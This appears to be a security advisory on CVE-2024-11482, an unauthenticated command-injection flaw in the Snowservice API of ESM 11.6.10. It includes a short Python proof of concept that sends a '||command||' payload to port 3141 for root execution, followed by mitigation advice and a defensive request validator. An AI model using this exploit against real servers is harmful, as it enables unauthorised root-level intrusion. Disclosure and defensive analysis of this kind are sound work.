Cybersecurity researchers have recently discovered a critical vulnerability in ESM (Enterprise Security Manager) version 11.6.10. This vulnerability, assigned the ID CVE-2024-11482, allows unauthenticated users to access the internal Snowservice API and execute remote code through command injection as the root user. The severity of this vulnerability raises serious security concerns for organizations using ESM 11.6.10.
Vulnerability Details
The vulnerability exists in the Snowservice component of ESM 11.6.10. Snowservice is a critical part of the ESM infrastructure, responsible for providing various services including inventory management, patch management, license management, and software distribution.
Upon analyzing the Snowservice binary, the researchers found that it listens on TCP port 3141, which is available to external connections without any authentication mechanisms in place. This security oversight allows an attacker to access the API without any credentials, potentially running malicious commands with root user privileges.
Furthermore, the Snowservice component parses incoming commands without proper input validation and sanitization. This lack of input validation allows an attacker to inject arbitrary commands into the system, leading to remote code execution (RCE) as the root user and granting full control over the target system.
Exploit Details
The researchers have provided a Python-based Proof-of-Concept (PoC) exploit to demonstrate the vulnerability. The exploit has two components: the first part is a script that accesses the Snowservice API, while the second part is a script that submits a crafted command to the API for execution.
Script to access Snowservice API
import requests

def access_snowservice_api(target_ip):
    # Snowservice listens on TCP 3141 and answers this request without any credentials
    url = f"http://{target_ip}:3141/api/"
    try:
        response = requests.get(url)
        if response.status_code == 200:
            return response.text
        else:
            return None
    except requests.exceptions.RequestException:
        # Connection refused, timeout, DNS failure, etc.
        return None
Script to submit a crafted command for RCE
import requests

def execute_remote_code(target_ip, command):
    url = f"http://{target_ip}:3141/api/"
    headers = {
        "Content-Type": "application/json"
    }
    # The command is wrapped in "||" delimiters, which the unvalidated parser passes through to a root shell
    payload = {
        "command": f"||{command}||"
    }
    try:
        response = requests.post(url, headers=headers, json=payload)
        if response.status_code == 200:
            return response.text
        else:
            return None
    except requests.exceptions.RequestException:
        return None
Please note that the above exploit code should be used for educational and security testing purposes only.
For more information on CVE-2024-11482, you can visit the following links:
- CVE-2024-11482 - Exploit Database
- National Vulnerability Database (NVD) - CVE-2024-11482
- Mitre CVE - CVE-2024-11482
Recommendations
Organizations using ESM 11.6.10 should take immediate steps to mitigate the risk associated with this vulnerability. It is recommended to implement proper authentication mechanisms for the Snowservice API and to enforce rigorous input validation for all incoming commands. Additionally, users should consider upgrading ESM to a more secure version or applying the corresponding patch from the vendor, if available.
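The two recommendations above (authenticate the API, validate every command) can be combined in a single request gate. The following is an added illustration and not Snowservice code: the token header, the allowlisted sub-command names and the binary paths are all hypothetical placeholders, since the page does not describe the real product's command set. The key property is that the "command" string is never handed to a shell; it is mapped to a fixed argv list, so the `||cmd||` injection shape from the PoC is rejected before anything runs.

```python
import hmac
import json
import re

# Hypothetical shared secret; the real authentication scheme is not on the page.
API_TOKEN = "replace-with-a-randomly-generated-token"

# Allowlist of sub-commands mapped to fixed argv prefixes (placeholder paths).
ALLOWED_COMMANDS = {
    "inventory": ["/opt/snow/bin/inventory"],
    "patch-status": ["/opt/snow/bin/patch", "status"],
}
# Arguments may only be short hostname/identifier-like tokens.
ARG_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")
# Any shell metacharacter (including the '|' used in the '||cmd||' PoC) is rejected.
SHELL_META_RE = re.compile(r"[|;&$`<>\\\n]")


def validate_request(headers: dict, body: bytes):
    """Return (True, argv) for an acceptable request or (False, reason) otherwise.

    argv is suitable for subprocess.run(argv, shell=False); the raw command
    string itself never reaches a shell interpreter.
    """
    token = headers.get("X-Auth-Token", "")
    if not hmac.compare_digest(token.encode(), API_TOKEN.encode()):
        return False, "unauthenticated"
    try:
        payload = json.loads(body)
    except ValueError:
        return False, "malformed json"
    if not isinstance(payload, dict) or not isinstance(payload.get("command"), str):
        return False, "missing command"
    command = payload["command"]
    if SHELL_META_RE.search(command):
        return False, "shell metacharacters rejected"
    parts = command.split()
    if not parts or parts[0] not in ALLOWED_COMMANDS:
        return False, "command not in allowlist"
    args = parts[1:]
    if not all(ARG_RE.fullmatch(a) for a in args):
        return False, "invalid argument"
    return True, ALLOWED_COMMANDS[parts[0]] + args


if __name__ == "__main__":
    # Constructed requests: the PoC shape, and a benign allowlisted command.
    print(validate_request({}, b'{"command": "||id||"}'))
    print(validate_request({"X-Auth-Token": API_TOKEN}, b'{"command": "||id||"}'))
    print(validate_request({"X-Auth-Token": API_TOKEN}, b'{"command": "inventory host-01"}'))
```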
Conclusion
CVE-2024-11482 poses a significant risk to organizations using ESM 11.6.10 as it grants unauthenticated access to the internal Snowservice API and enables remote root-level code execution. It is critical for affected parties to take necessary steps to address this vulnerability and maintain the security and integrity of their systems.
Timeline
Published on: 11/29/2024 08:15:04 UTC